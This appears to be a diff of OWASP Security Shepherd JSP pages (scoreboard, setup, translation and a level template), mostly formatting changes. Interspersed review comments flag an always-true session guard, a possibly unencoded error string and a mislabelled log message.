- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "DEBUG: scoreboard.jsp *************************");
-
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // Also, if tokenCookie != null, then the page is good to continue loading
- if ((Validate.validateSession(ses) && tokenCookie != null) || ScoreboardStatus.isPublicScoreboard()) {
-
- // Getting Session Variables
-
- String userRole = (String) ses.getAttribute("userRole");
- boolean canSeeScoreboard = true;
-
- canSeeScoreboard = ScoreboardStatus.canSeeScoreboard(userRole);
-
- //Log User Name
-
- String userName = (String) ses.getAttribute("userName");
-
- if (userName == null) {
- if (canSeeScoreboard) {
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Scoreboard accessed while not logged in");
-
- } else {
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Scoreboard accessed by an unauthorized user");
- }
- } else {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Scoreboard accessed by: " + userName.toString(), userName);
- }
-
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = "";
-
- if (tokenCookie != null) {
- csrfToken = Encode.forHtml(tokenCookie.getValue());
- }
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "DEBUG: scoreboard.jsp *************************");
+
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
+ if (request.getSession() != null) {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try {
+ tokenCookie = Validate.getToken(request.getCookies());
+ } catch (Exception htmlE) {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // Also, if tokenCookie != null, then the page is good to continue loading
+ if ((Validate.validateSession(ses) && tokenCookie != null) || ScoreboardStatus.isPublicScoreboard()) {
+
+ // Getting Session Variables
+
+ String userRole = (String) ses.getAttribute("userRole");
+ boolean canSeeScoreboard = true;
+
+ canSeeScoreboard = ScoreboardStatus.canSeeScoreboard(userRole);
+
+ //Log User Name
+
+ String userName = (String) ses.getAttribute("userName");
+
+ if (userName == null) {
+ if (canSeeScoreboard) {
+
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Scoreboard accessed while not logged in");
+
+ } else {
+
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Scoreboard accessed by an unauthorized user");
+ }
+ } else {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Scoreboard accessed by: " + userName.toString(), userName);
+ }
+
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+ String csrfToken = "";
+
+ if (tokenCookie != null) {
+ csrfToken = Encode.forHtml(tokenCookie.getValue());
+ }
%>
- OWASP Security Shepherd - Scoreboard
+OWASP Security Shepherd - Scoreboard
-
-
+
+
-
-
-
+
\ No newline at end of file
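Review bot: The outer guard `if (request.getSession() != null)` at the top of the scoreboard.jsp scriptlet can never be false, because `HttpServletRequest.getSession()` creates a session when none exists. Its else branch (outside the visible lines) is therefore unreachable, and every anonymous request to the page allocates a session. The same guard appears in the webLevelTemplate.jsp hunk of this diff, where the final `else` redirect to `../loggedOutSheep.html` is dead for the same reason. Use `HttpSession ses = request.getSession(false);` and test `ses != null`, but note that the `ScoreboardStatus.isPublicScoreboard()` path must then handle a null `ses` before it calls `ses.getAttribute("userRole")`. Separately, `boolean canSeeScoreboard = true;` is overwritten by the next statement and can be folded into `boolean canSeeScoreboard = ScoreboardStatus.canSeeScoreboard(userRole);`.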
diff --git a/src/main/webapp/setup.jsp b/src/main/webapp/setup.jsp
index ca9523e1c..131ef7e4d 100644
--- a/src/main/webapp/setup.jsp
+++ b/src/main/webapp/setup.jsp
@@ -1,500 +1,500 @@
-<%@page import="dbProcs.Constants" %>
-<%@page import="servlets.Setup" %>
+<%@page import="dbProcs.Constants"%>
+<%@page import="servlets.Setup"%>
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="utils.*, java.util.Properties, org.owasp.encoder.Encode" %>
-<%@ include file="translation.jsp" %>
+ language="java"
+ import="utils.*, java.util.Properties, org.owasp.encoder.Encode"%>
+<%@ include file="translation.jsp"%>
<%
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- HttpSession ses = request.getSession();
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
- String error = "";
- boolean hasDBFile = false;
- Properties mysql_props;
+ HttpSession ses = request.getSession();
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
+ String error = "";
+ boolean hasDBFile = false;
+ Properties mysql_props;
- if (ses.getAttribute("dbConnectionFailed") != null) {
- error = ses.getAttribute("dbConnectionFailed").toString();
- ses.removeAttribute("dbConnectionFailed");
- }
+ if (ses.getAttribute("dbConnectionFailed") != null) {
+ error = ses.getAttribute("dbConnectionFailed").toString();
+ ses.removeAttribute("dbConnectionFailed");
+ }
- if (ses.getAttribute("dbAuthFailed") != null) {
- error = ses.getAttribute("dbAuthFailed").toString();
- ses.removeAttribute("dbAuthFailed");
- }
+ if (ses.getAttribute("dbAuthFailed") != null) {
+ error = ses.getAttribute("dbAuthFailed").toString();
+ ses.removeAttribute("dbAuthFailed");
+ }
- if (ses.getAttribute("dbSetupFailed") != null) {
- error = ses.getAttribute("dbSetupFailed").toString();
- ses.removeAttribute("dbSetupFailed");
- }
+ if (ses.getAttribute("dbSetupFailed") != null) {
+ error = ses.getAttribute("dbSetupFailed").toString();
+ ses.removeAttribute("dbSetupFailed");
+ }
- if (Setup.isInstalled()) {
- response.sendRedirect("login.jsp");
- } else {
- mysql_props = Setup.getDBProps();
+ if (Setup.isInstalled()) {
+ response.sendRedirect("login.jsp");
+ } else {
+ mysql_props = Setup.getDBProps();
- if (mysql_props != null) {
- hasDBFile = true;
+ if (mysql_props != null) {
+ hasDBFile = true;
- String connectionURL = mysql_props.getProperty("databaseConnectionURL");
- if (connectionURL == null) {
- hasDBFile = false;
- }
- String databaseSchema = mysql_props.getProperty("databaseSchema");
- if (databaseSchema == null) {
- hasDBFile = false;
+ String connectionURL = mysql_props.getProperty("databaseConnectionURL");
+ if (connectionURL == null) {
+ hasDBFile = false;
+ }
+ String databaseSchema = mysql_props.getProperty("databaseSchema");
+ if (databaseSchema == null) {
+ hasDBFile = false;
- }
- String dbOptions = mysql_props.getProperty("databaseOptions");
- if (dbOptions == null) {
- hasDBFile = false;
+ }
+ String dbOptions = mysql_props.getProperty("databaseOptions");
+ if (dbOptions == null) {
+ hasDBFile = false;
- }
- String driverType = mysql_props.getProperty("DriverType");
- if (driverType == null) {
- hasDBFile = false;
+ }
+ String driverType = mysql_props.getProperty("DriverType");
+ if (driverType == null) {
+ hasDBFile = false;
- }
- String username = mysql_props.getProperty("databaseUsername");
- if (username == null) {
- hasDBFile = false;
+ }
+ String username = mysql_props.getProperty("databaseUsername");
+ if (username == null) {
+ hasDBFile = false;
- }
- String password = mysql_props.getProperty("databasePassword");
- if (password == null) {
- hasDBFile = false;
+ }
+ String password = mysql_props.getProperty("databasePassword");
+ if (password == null) {
+ hasDBFile = false;
- }
+ }
- }
+ }
- }
+ }
%>
- OWASP Security Shepherd - Login
+OWASP Security Shepherd - Login
-
-
+
+
-
-
-
-
-
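Review bot: The `error` value copied from the `dbConnectionFailed`, `dbAuthFailed` and `dbSetupFailed` session attributes in setup.jsp is kept as a raw string, although the page imports `org.owasp.encoder.Encode`. Where it is written into the page is not visible in this hunk, so this is something to verify rather than a confirmed finding. If it reaches the markup through an expression such as `<%= error %>`, it should be emitted as `Encode.forHtml(error)`, since the text may originate from connection or driver failure messages. The log line also names the wrong page (`"... Conntected to login.jsp ..."` inside setup.jsp), which misleads anyone correlating setup attempts in the logs. A message such as `"Somebody (" + ses.getAttribute("lang") + ") connected to setup.jsp"` would match the file.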
diff --git a/src/main/webapp/translation.jsp b/src/main/webapp/translation.jsp
index eeb613263..ea7528a7a 100644
--- a/src/main/webapp/translation.jsp
+++ b/src/main/webapp/translation.jsp
@@ -1,11 +1,11 @@
-<%@page import="java.util.Locale" %>
-<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
-<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %>
+<%@page import="java.util.Locale"%>
+<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
+<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt"%>
+ value="${not empty param.lang ? param.lang : not empty lang ? lang : pageContext.request.locale}"
+ scope="session" />
-
-
-
\ No newline at end of file
+
+
+
\ No newline at end of file
diff --git a/src/main/webapp/webLevelTemplate.jsp b/src/main/webapp/webLevelTemplate.jsp
index 536719c18..59978e304 100644
--- a/src/main/webapp/webLevelTemplate.jsp
+++ b/src/main/webapp/webLevelTemplate.jsp
@@ -1,136 +1,143 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java" import="utils.*, org.owasp.encoder.Encode" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- /**
- *
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Your Name
- */
+/**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Your Name
+ */
//MUST be in English and no Quotes In level Name
- String levelName = "Level Name";
+String levelName = "Level Name";
//Alphanumeric Only
- String levelHash = "Level Hash";
+String levelHash = "Level Hash";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("thei18nFileWithTheStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("thei18nFileWithTheStrings", locale);
//Used more than once translations
- String i18nLevelName = bundle.getString("title.");
+String i18nLevelName = bundle.getString("title.");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%=i18nLevelName%>
-
-
+
+Security Shepherd - <%=i18nLevelName%>
+
-
-
-
<%= i18nLevelName %>
-
-
- <%= bundle.getString("paragraph.info.1") %>
-
Download Me
- <% /* IF you need a form - Present it like this */ %>
- <%
- /*
-
-
-
-
-
-
-
-
Loading...
-
-
-
-
-
-
- */
- %>
-
-
-<% /*If you need to call the Server Do it like this */ %>
-<%
- /*
-
- */
-%>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+
+
+
<%= i18nLevelName %>
+
+ <%= bundle.getString("paragraph.info.1") %>
+
Download Me
+ <% /* IF you need a form - Present it like this */ %>
+ <%
+ /*
+
+
+
+
+
+
+
+
Loading...
+
+
+
+
+
+
+ */
+ %>
+
+
+ <% /*If you need to call the Server Do it like this */ %>
+ <%
+ /*
+
+ */
+ %>
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("../loggedOutSheep.html");
+}
%>